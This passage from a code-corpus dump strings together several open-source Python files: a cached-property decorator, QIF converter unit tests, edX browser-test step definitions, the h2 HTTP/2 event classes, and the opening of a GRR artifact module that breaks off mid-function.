fset = self._wrap_fset(fset)
if callable(fdel):
fdel = self._wrap_fdel(fdel)
# Create the property.
super(_CachedProperty, self).__init__(fget, fset, fdel, doc)
def _wrap_fget(self, fget):
@wraps(fget)
def do_fget(obj):
if hasattr(obj, self._cache_name):
return getattr(obj, self._cache_name)
# Generate the value to cache.
value = fget(obj)
if value:
setattr(obj, self._cache_name, value)
return value
return do_fget
def _wrap_fset(self, fset):
@wraps(fset)
def do_fset(obj, value):
fset(obj, value)
setattr(obj, self._cache_name, value)
return do_fset
def _wrap_fdel(self, fdel):
@wraps(fdel)
def do_fdel(obj):
fdel(obj)
delattr(obj, self._cache_name)
return do_fdel
# Public name for the cached property decorator. Using a class as a decorator just looks plain ugly. :P
cached_property = _CachedProperty
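# --- Illustrative usage (added sketch, not part of the original module) ---
# A minimal, hypothetical example of the decorator defined above: the first
# access of `total` runs the getter and stores the result on the instance as
# `_total_cache`; later accesses return that attribute directly. As noted in
# the module docstring, falsy return values are not cached.
class _ExampleReport(object):
    def __init__(self, values):
        self._values = list(values)

    @cached_property
    def total(self):
        # Stands in for an expensive lookup, e.g. a database aggregate.
        return sum(self._values)

# report = _ExampleReport([1, 2, 3])
# report.total          # computed once -> 6
# report._total_cache   # subsequent accesses are served from this attribute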
|
apache-2.0
|
myfreecomm/fixofx
|
test/ofxtools_qif_converter.py
|
1
|
9183
|
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../3rdparty')
sys.path.insert(0, '../lib')
import ofxtools
import textwrap
import unittest
from pyparsing import ParseException
from time import localtime, strftime
class QifConverterTests(unittest.TestCase):
def test_bank_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_ccard_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CREDITCARD")
def test_no_stmttype(self):
qiftext = textwrap.dedent('''\
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_no_txns(self):
qiftext = textwrap.dedent('''\
!Type:Bank
''')
today = strftime("%Y%m%d", localtime())
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, today)
self.assertEqual(converter.end_date, today)
def test_us_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_uk_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_ambiguous_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_mixed_us_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/12/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_mixed_uk_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_slashfree_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12012005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_unparseable_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DFnargle
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_len_eight_no_int_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DAAAAAAAA
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_asc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
D01/27/2005
^
D02/01/2005
^
D02/01/2005
^
D02/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_desc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/13/2005
^
D02/01/2005
^
D02/01/2005
^
D01/27/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_mixed_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
^
D02/13/2005
^
D01/13/2005
^
D02/01/2005
^
D01/27/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_default_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>USD') != -1)
def test_found_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^EUR
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>EUR') != -1)
def test_explicit_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext, curdef='GBP')
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>GBP') != -1)
def test_amount2(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
U25.42
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20050201"][0]
self.assertEqual(txn["Amount"], "25.42")
def test_bad_amount_precision(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.930
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn["Amount"], "417.93")
def test_dash_amount(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
T25.42
^
D02/01/2005
T-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn_list = converter.txns_by_date["20050201"]
self.assertEqual(len(txn_list), 1)
txn = txn_list[0]
self.assertEqual(txn["Amount"], "25.42")
def test_trailing_minus(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D08/06/2008
T26.24-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20080806"][0]
self.assertEqual(txn["Amount"], "-26.24")
def test_n_a_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NN/A
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NXXXX-XXXX-XXXX-1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/25/2007
T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_check_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.get("Type"), "CHECK")
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
XiaodunServerGroup/ddyedx
|
common/djangoapps/terrain/steps.py
|
7
|
6704
|
#pylint: disable=C0111
#pylint: disable=W0621
# Disable the "wildcard import" warning so we can bring in all methods from
# course helpers and ui helpers
#pylint: disable=W0401
# Disable the "Unused import %s from wildcard import" warning
#pylint: disable=W0614
# Disable the "unused argument" warning because lettuce uses "step"
#pylint: disable=W0613
# django_url is assigned late in the process of loading lettuce,
# so we import this as a module, and then read django_url from
# it to get the correct value
import lettuce.django
from lettuce import world, step
from .course_helpers import *
from .ui_helpers import *
from nose.tools import assert_equals # pylint: disable=E0611
from logging import getLogger
logger = getLogger(__name__)
@step(r'I wait (?:for )?"(\d+\.?\d*)" seconds?$')
def wait_for_seconds(step, seconds):
world.wait(seconds)
@step('I reload the page$')
def reload_the_page(step):
world.wait_for_ajax_complete()
world.browser.reload()
world.wait_for_js_to_load()
@step('I press the browser back button$')
def browser_back(step):
world.browser.driver.back()
@step('I (?:visit|access|open) the homepage$')
def i_visit_the_homepage(step):
world.visit('/')
assert world.is_css_present('header.global')
@step(u'I (?:visit|access|open) the dashboard$')
def i_visit_the_dashboard(step):
world.visit('/dashboard')
assert world.is_css_present('section.container.dashboard')
@step('I should be on the dashboard page$')
def i_should_be_on_the_dashboard(step):
assert world.is_css_present('section.container.dashboard')
assert 'Dashboard' in world.browser.title
@step(u'I (?:visit|access|open) the courses page$')
def i_am_on_the_courses_page(step):
world.visit('/courses')
assert world.is_css_present('section.courses')
@step(u'I press the "([^"]*)" button$')
def and_i_press_the_button(step, value):
button_css = 'input[value="%s"]' % value
world.css_click(button_css)
@step(u'I click the link with the text "([^"]*)"$')
def click_the_link_with_the_text_group1(step, linktext):
world.click_link(linktext)
@step('I should see that the path is "([^"]*)"$')
def i_should_see_that_the_path_is(step, path):
assert world.url_equals(path)
@step(u'the page title should be "([^"]*)"$')
def the_page_title_should_be(step, title):
assert_equals(world.browser.title, title)
@step(u'the page title should contain "([^"]*)"$')
def the_page_title_should_contain(step, title):
assert(title in world.browser.title)
@step('I log in$')
def i_log_in(step):
world.log_in(username='robot', password='test')
@step('I am a logged in user$')
def i_am_logged_in_user(step):
world.create_user('robot', 'test')
world.log_in(username='robot', password='test')
@step('I am not logged in$')
def i_am_not_logged_in(step):
world.visit('logout')
@step('I am staff for course "([^"]*)"$')
def i_am_staff_for_course_by_id(step, course_id):
world.register_by_course_id(course_id, True)
@step(r'click (?:the|a) link (?:called|with the text) "([^"]*)"$')
def click_the_link_called(step, text):
world.click_link(text)
@step(r'should see that the url is "([^"]*)"$')
def should_have_the_url(step, url):
assert_equals(world.browser.url, url)
@step(r'should see (?:the|a) link (?:called|with the text) "([^"]*)"$')
def should_see_a_link_called(step, text):
assert len(world.browser.find_link_by_text(text)) > 0
@step(r'should see (?:the|a) link with the id "([^"]*)" called "([^"]*)"$')
def should_have_link_with_id_and_text(step, link_id, text):
link = world.browser.find_by_id(link_id)
assert len(link) > 0
assert_equals(link.text, text)
@step(r'should see a link to "([^"]*)" with the text "([^"]*)"$')
def should_have_link_with_path_and_text(step, path, text):
link = world.browser.find_link_by_text(text)
assert len(link) > 0
assert_equals(link.first["href"], lettuce.django.django_url(path))
@step(r'should( not)? see "(.*)" (?:somewhere|anywhere) (?:in|on) (?:the|this) page')
def should_see_in_the_page(step, doesnt_appear, text):
if world.LETTUCE_SELENIUM_CLIENT == 'saucelabs':
multiplier = 2
else:
multiplier = 1
if doesnt_appear:
assert world.browser.is_text_not_present(text, wait_time=5 * multiplier)
else:
assert world.browser.is_text_present(text, wait_time=5 * multiplier)
@step('I am logged in$')
def i_am_logged_in(step):
world.create_user('robot', 'test')
world.log_in(username='robot', password='test')
world.browser.visit(lettuce.django.django_url('/'))
dash_css = 'section.container.dashboard'
assert world.is_css_present(dash_css)
@step(u'I am an edX user$')
def i_am_an_edx_user(step):
world.create_user('robot', 'test')
@step(u'User "([^"]*)" is an edX user$')
def registered_edx_user(step, uname):
world.create_user(uname, 'test')
@step(u'All dialogs should be closed$')
def dialogs_are_closed(step):
assert world.dialogs_closed()
@step(u'visit the url "([^"]*)"')
def visit_url(step, url):
world.browser.visit(lettuce.django.django_url(url))
@step(u'wait for AJAX to (?:finish|complete)')
def wait_ajax(_step):
wait_for_ajax_complete()
@step('I will confirm all alerts')
def i_confirm_all_alerts(step):
"""
Please note: This method must be called RIGHT BEFORE an expected alert
Window variables are page local and thus all changes are removed upon navigating to a new page
In addition, this method changes the functionality of ONLY future alerts
"""
world.browser.execute_script('window.confirm = function(){return true;} ; window.alert = function(){return;}')
@step('I will cancel all alerts')
def i_cancel_all_alerts(step):
"""
Please note: This method must be called RIGHT BEFORE an expected alert
Window variables are page local and thus all changes are removed upon navigating to a new page
In addition, this method changes the functionality of ONLY future alerts
"""
world.browser.execute_script('window.confirm = function(){return false;} ; window.alert = function(){return;}')
@step('I will answer all prompts with "([^"]*)"')
def i_answer_prompts_with(step, prompt):
"""
Please note: This method must be called RIGHT BEFORE an expected alert
Window variables are page local and thus all changes are removed upon navigating to a new page
In addition, this method changes the functionality of ONLY future alerts
"""
    world.browser.execute_script('window.prompt = function(){return "%s";}' % prompt)
@step('I run ipdb')
def run_ipdb(_step):
"""Run ipdb as step for easy debugging"""
import ipdb
ipdb.set_trace()
assert True
|
agpl-3.0
|
szeged/servo
|
tests/wpt/web-platform-tests/tools/third_party/h2/h2/events.py
|
27
|
21277
|
# -*- coding: utf-8 -*-
"""
h2/events
~~~~~~~~~
Defines Event types for HTTP/2.
Events are returned by the H2 state machine to allow implementations to keep
track of events triggered by receiving data. Each time data is provided to the
H2 state machine it processes the data and returns a list of Event objects.
"""
import binascii
from .settings import ChangedSetting, _setting_code_from_int
class Event(object):
"""
Base class for h2 events.
"""
pass
class RequestReceived(Event):
"""
The RequestReceived event is fired whenever request headers are received.
This event carries the HTTP headers for the given request and the stream ID
of the new stream.
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``stream_ended`` and ``priority_updated`` properties.
"""
def __init__(self):
#: The Stream ID for the stream this request was made on.
self.stream_id = None
#: The request headers.
self.headers = None
#: If this request also ended the stream, the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` event will be available
#: here.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
#: If this request also had associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<RequestReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class ResponseReceived(Event):
"""
The ResponseReceived event is fired whenever response headers are received.
This event carries the HTTP headers for the given response and the stream
ID of the new stream.
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``stream_ended`` and ``priority_updated`` properties.
"""
def __init__(self):
#: The Stream ID for the stream this response was made on.
self.stream_id = None
#: The response headers.
self.headers = None
#: If this response also ended the stream, the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` event will be available
#: here.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
#: If this response also had associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<ResponseReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class TrailersReceived(Event):
"""
The TrailersReceived event is fired whenever trailers are received on a
stream. Trailers are a set of headers sent after the body of the
request/response, and are used to provide information that wasn't known
ahead of time (e.g. content-length). This event carries the HTTP header
fields that form the trailers and the stream ID of the stream on which they
were received.
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``stream_ended`` and ``priority_updated`` properties.
"""
def __init__(self):
#: The Stream ID for the stream on which these trailers were received.
self.stream_id = None
#: The trailers themselves.
self.headers = None
#: Trailers always end streams. This property has the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` in it.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
#: If the trailers also set associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<TrailersReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class _HeadersSent(Event):
"""
The _HeadersSent event is fired whenever headers are sent.
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _ResponseSent(_HeadersSent):
"""
The _ResponseSent event is fired whenever response headers are sent
on a stream.
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _RequestSent(_HeadersSent):
"""
The _RequestSent event is fired whenever request headers are sent
on a stream.
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _TrailersSent(_HeadersSent):
"""
The _TrailersSent event is fired whenever trailers are sent on a
stream. Trailers are a set of headers sent after the body of the
request/response, and are used to provide information that wasn't known
ahead of time (e.g. content-length).
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _PushedRequestSent(_HeadersSent):
"""
The _PushedRequestSent event is fired whenever pushed request headers are
sent.
This is an internal event, used to determine validation steps on outgoing
header blocks.
"""
pass
class InformationalResponseReceived(Event):
"""
The InformationalResponseReceived event is fired when an informational
response (that is, one whose status code is a 1XX code) is received from
the remote peer.
The remote peer may send any number of these, from zero upwards. These
responses are most commonly sent in response to requests that have the
``expect: 100-continue`` header field present. Most users can safely
ignore this event unless you are intending to use the
``expect: 100-continue`` flow, or are for any reason expecting a different
1XX status code.
.. versionadded:: 2.2.0
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``priority_updated`` property.
"""
def __init__(self):
#: The Stream ID for the stream this informational response was made
#: on.
self.stream_id = None
#: The headers for this informational response.
self.headers = None
#: If this response also had associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<InformationalResponseReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class DataReceived(Event):
"""
The DataReceived event is fired whenever data is received on a stream from
the remote peer. The event carries the data itself, and the stream ID on
which the data was received.
.. versionchanged:: 2.4.0
Added ``stream_ended`` property.
"""
def __init__(self):
#: The Stream ID for the stream this data was received on.
self.stream_id = None
#: The data itself.
self.data = None
#: The amount of data received that counts against the flow control
#: window. Note that padding counts against the flow control window, so
#: when adjusting flow control you should always use this field rather
#: than ``len(data)``.
self.flow_controlled_length = None
#: If this data chunk also completed the stream, the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` event will be available
#: here.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
def __repr__(self):
return (
"<DataReceived stream_id:%s, "
"flow_controlled_length:%s, "
"data:%s>" % (
self.stream_id,
self.flow_controlled_length,
_bytes_representation(self.data[:20]),
)
)
class WindowUpdated(Event):
"""
The WindowUpdated event is fired whenever a flow control window changes
size. HTTP/2 defines flow control windows for connections and streams: this
event fires for both connections and streams. The event carries the ID of
the stream to which it applies (set to zero if the window update applies to
the connection), and the delta in the window size.
"""
def __init__(self):
#: The Stream ID of the stream whose flow control window was changed.
#: May be ``0`` if the connection window was changed.
self.stream_id = None
#: The window delta.
self.delta = None
def __repr__(self):
return "<WindowUpdated stream_id:%s, delta:%s>" % (
self.stream_id, self.delta
)
class RemoteSettingsChanged(Event):
"""
The RemoteSettingsChanged event is fired whenever the remote peer changes
its settings. It contains a complete inventory of changed settings,
including their previous values.
In HTTP/2, settings changes need to be acknowledged. hyper-h2 automatically
acknowledges settings changes for efficiency. However, it is possible that
the caller may not be happy with the changed setting.
When this event is received, the caller should confirm that the new
settings are acceptable. If they are not acceptable, the user should close
the connection with the error code :data:`PROTOCOL_ERROR
<h2.errors.ErrorCodes.PROTOCOL_ERROR>`.
.. versionchanged:: 2.0.0
Prior to this version the user needed to acknowledge settings changes.
This is no longer the case: hyper-h2 now automatically acknowledges
them.
"""
def __init__(self):
#: A dictionary of setting byte to
#: :class:`ChangedSetting <h2.settings.ChangedSetting>`, representing
#: the changed settings.
self.changed_settings = {}
@classmethod
def from_settings(cls, old_settings, new_settings):
"""
Build a RemoteSettingsChanged event from a set of changed settings.
:param old_settings: A complete collection of old settings, in the form
of a dictionary of ``{setting: value}``.
:param new_settings: All the changed settings and their new values, in
the form of a dictionary of ``{setting: value}``.
"""
e = cls()
for setting, new_value in new_settings.items():
setting = _setting_code_from_int(setting)
original_value = old_settings.get(setting)
change = ChangedSetting(setting, original_value, new_value)
e.changed_settings[setting] = change
return e
def __repr__(self):
return "<RemoteSettingsChanged changed_settings:{%s}>" % (
", ".join(repr(cs) for cs in self.changed_settings.values()),
)
class PingAcknowledged(Event):
"""
The PingAcknowledged event is fired whenever a user-emitted PING is
acknowledged. This contains the data in the ACK'ed PING, allowing the
user to correlate PINGs and calculate RTT.
"""
def __init__(self):
#: The data included on the ping.
self.ping_data = None
def __repr__(self):
return "<PingAcknowledged ping_data:%s>" % (
_bytes_representation(self.ping_data),
)
class StreamEnded(Event):
"""
The StreamEnded event is fired whenever a stream is ended by a remote
party. The stream may not be fully closed if it has not been closed
locally, but no further data or headers should be expected on that stream.
"""
def __init__(self):
#: The Stream ID of the stream that was closed.
self.stream_id = None
def __repr__(self):
return "<StreamEnded stream_id:%s>" % self.stream_id
class StreamReset(Event):
"""
The StreamReset event is fired in two situations. The first is when the
remote party forcefully resets the stream. The second is when the remote
party has made a protocol error which only affects a single stream. In this
case, Hyper-h2 will terminate the stream early and return this event.
.. versionchanged:: 2.0.0
This event is now fired when Hyper-h2 automatically resets a stream.
"""
def __init__(self):
#: The Stream ID of the stream that was reset.
self.stream_id = None
#: The error code given. Either one of :class:`ErrorCodes
#: <h2.errors.ErrorCodes>` or ``int``
self.error_code = None
#: Whether the remote peer sent a RST_STREAM or we did.
self.remote_reset = True
def __repr__(self):
return "<StreamReset stream_id:%s, error_code:%s, remote_reset:%s>" % (
self.stream_id, self.error_code, self.remote_reset
)
class PushedStreamReceived(Event):
"""
The PushedStreamReceived event is fired whenever a pushed stream has been
received from a remote peer. The event carries on it the new stream ID, the
ID of the parent stream, and the request headers pushed by the remote peer.
"""
def __init__(self):
#: The Stream ID of the stream created by the push.
self.pushed_stream_id = None
#: The Stream ID of the stream that the push is related to.
self.parent_stream_id = None
#: The request headers, sent by the remote party in the push.
self.headers = None
def __repr__(self):
return (
"<PushedStreamReceived pushed_stream_id:%s, parent_stream_id:%s, "
"headers:%s>" % (
self.pushed_stream_id,
self.parent_stream_id,
self.headers,
)
)
class SettingsAcknowledged(Event):
"""
The SettingsAcknowledged event is fired whenever a settings ACK is received
from the remote peer. The event carries on it the settings that were
    acknowledged, in the same format as
:class:`h2.events.RemoteSettingsChanged`.
"""
def __init__(self):
#: A dictionary of setting byte to
#: :class:`ChangedSetting <h2.settings.ChangedSetting>`, representing
#: the changed settings.
self.changed_settings = {}
def __repr__(self):
return "<SettingsAcknowledged changed_settings:{%s}>" % (
", ".join(repr(cs) for cs in self.changed_settings.values()),
)
class PriorityUpdated(Event):
"""
The PriorityUpdated event is fired whenever a stream sends updated priority
information. This can occur when the stream is opened, or at any time
during the stream lifetime.
This event is purely advisory, and does not need to be acted on.
.. versionadded:: 2.0.0
"""
def __init__(self):
#: The ID of the stream whose priority information is being updated.
self.stream_id = None
#: The new stream weight. May be the same as the original stream
#: weight. An integer between 1 and 256.
self.weight = None
#: The stream ID this stream now depends on. May be ``0``.
self.depends_on = None
#: Whether the stream *exclusively* depends on the parent stream. If it
#: does, this stream should inherit the current children of its new
#: parent.
self.exclusive = None
def __repr__(self):
return (
"<PriorityUpdated stream_id:%s, weight:%s, depends_on:%s, "
"exclusive:%s>" % (
self.stream_id,
self.weight,
self.depends_on,
self.exclusive
)
)
class ConnectionTerminated(Event):
"""
The ConnectionTerminated event is fired when a connection is torn down by
the remote peer using a GOAWAY frame. Once received, no further action may
be taken on the connection: a new connection must be established.
"""
def __init__(self):
#: The error code cited when tearing down the connection. Should be
#: one of :class:`ErrorCodes <h2.errors.ErrorCodes>`, but may not be if
#: unknown HTTP/2 extensions are being used.
self.error_code = None
#: The stream ID of the last stream the remote peer saw. This can
#: provide an indication of what data, if any, never reached the remote
#: peer and so can safely be resent.
self.last_stream_id = None
#: Additional debug data that can be appended to GOAWAY frame.
self.additional_data = None
def __repr__(self):
return (
"<ConnectionTerminated error_code:%s, last_stream_id:%s, "
"additional_data:%s>" % (
self.error_code,
self.last_stream_id,
_bytes_representation(
self.additional_data[:20]
if self.additional_data else None)
)
)
class AlternativeServiceAvailable(Event):
"""
The AlternativeServiceAvailable event is fired when the remote peer
advertises an `RFC 7838 <https://tools.ietf.org/html/rfc7838>`_ Alternative
Service using an ALTSVC frame.
This event always carries the origin to which the ALTSVC information
applies. That origin is either supplied by the server directly, or inferred
by hyper-h2 from the ``:authority`` pseudo-header field that was sent by
the user when initiating a given stream.
This event also carries what RFC 7838 calls the "Alternative Service Field
Value", which is formatted like a HTTP header field and contains the
relevant alternative service information. Hyper-h2 does not parse or in any
way modify that information: the user is required to do that.
This event can only be fired on the client end of a connection.
.. versionadded:: 2.3.0
"""
def __init__(self):
#: The origin to which the alternative service field value applies.
#: This field is either supplied by the server directly, or inferred by
#: hyper-h2 from the ``:authority`` pseudo-header field that was sent
#: by the user when initiating the stream on which the frame was
#: received.
self.origin = None
#: The ALTSVC field value. This contains information about the HTTP
#: alternative service being advertised by the server. Hyper-h2 does
#: not parse this field: it is left exactly as sent by the server. The
#: structure of the data in this field is given by `RFC 7838 Section 3
#: <https://tools.ietf.org/html/rfc7838#section-3>`_.
self.field_value = None
def __repr__(self):
return (
"<AlternativeServiceAvailable origin:%s, field_value:%s>" % (
self.origin.decode('utf-8', 'ignore'),
self.field_value.decode('utf-8', 'ignore'),
)
)
class UnknownFrameReceived(Event):
"""
The UnknownFrameReceived event is fired when the remote peer sends a frame
that hyper-h2 does not understand. This occurs primarily when the remote
peer is employing HTTP/2 extensions that hyper-h2 doesn't know anything
about.
RFC 7540 requires that HTTP/2 implementations ignore these frames. hyper-h2
does so. However, this event is fired to allow implementations to perform
special processing on those frames if needed (e.g. if the implementation
is capable of handling the frame itself).
.. versionadded:: 2.7.0
"""
def __init__(self):
#: The hyperframe Frame object that encapsulates the received frame.
self.frame = None
def __repr__(self):
return "<UnknownFrameReceived>"
def _bytes_representation(data):
"""
Converts a bytestring into something that is safe to print on all Python
platforms.
This function is relatively expensive, so it should not be called on the
mainline of the code. It's safe to use in things like object repr methods
though.
"""
if data is None:
return None
hex = binascii.hexlify(data)
# This is moderately clever: on all Python versions hexlify returns a byte
# string. On Python 3 we want an actual string, so we just check whether
# that's what we have.
if not isinstance(hex, str): # pragma: no cover
hex = hex.decode('ascii')
return hex
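# --- Illustrative usage (added sketch, not part of the original module) ---
# A minimal example of how these events are typically consumed. The `conn`
# argument is assumed to be an h2.connection.H2Connection owned by the caller;
# socket handling is out of scope here. Each call to receive_data() returns a
# list of the Event subclasses defined above, which the caller dispatches on.
def _example_dispatch(conn, data):
    """Feed raw bytes into an h2 connection and react to the returned events."""
    for event in conn.receive_data(data):
        if isinstance(event, RequestReceived):
            print("request on stream %s: %r" % (event.stream_id, event.headers))
        elif isinstance(event, DataReceived):
            # Padding counts against flow control, so acknowledge the
            # flow-controlled length rather than len(event.data).
            conn.acknowledge_received_data(
                event.flow_controlled_length, event.stream_id)
        elif isinstance(event, StreamEnded):
            print("stream %s ended" % event.stream_id)
        elif isinstance(event, ConnectionTerminated):
            print("connection closed, error code %s" % event.error_code)
    return conn.data_to_send()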
|
mpl-2.0
|
simsong/grr-insider
|
lib/artifact.py
|
1
|
15969
|
#!/usr/bin/env python
"""Base classes for artifacts."""
import logging
from grr.lib import aff4
from grr.lib import artifact_lib
from grr.lib import config_lib
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import utils
class AFF4ResultWriter(object):
"""A wrapper class to allow writing objects to the AFF4 space."""
def __init__(self, path, aff4_type, aff4_attribute, mode):
self.path = path
self.aff4_type = aff4_type
self.aff4_attribute = aff4_attribute
self.mode = mode
def GetArtifactKnowledgeBase(client_obj, allow_uninitialized=False):
"""This generates an artifact knowledge base from a GRR client.
Args:
client_obj: A GRRClient object which is opened for reading.
allow_uninitialized: If True we accept an uninitialized knowledge_base.
Returns:
A KnowledgeBase semantic value.
Raises:
ArtifactProcessingError: If called when the knowledge base has not been
initialized.
KnowledgeBaseUninitializedError: If we failed to initialize the knowledge
base.
This is needed so that the artifact library has a standardized
interface to the data that is actually stored in the GRRClient object in
the GRR datastore.
  We expect that the client KNOWLEDGE_BASE is already filled out through the
KnowledgeBaseInitialization flow, but attempt to make some intelligent
guesses if things failed.
"""
client_schema = client_obj.Schema
kb = client_obj.Get(client_schema.KNOWLEDGE_BASE)
if not allow_uninitialized and (not kb or not kb.os):
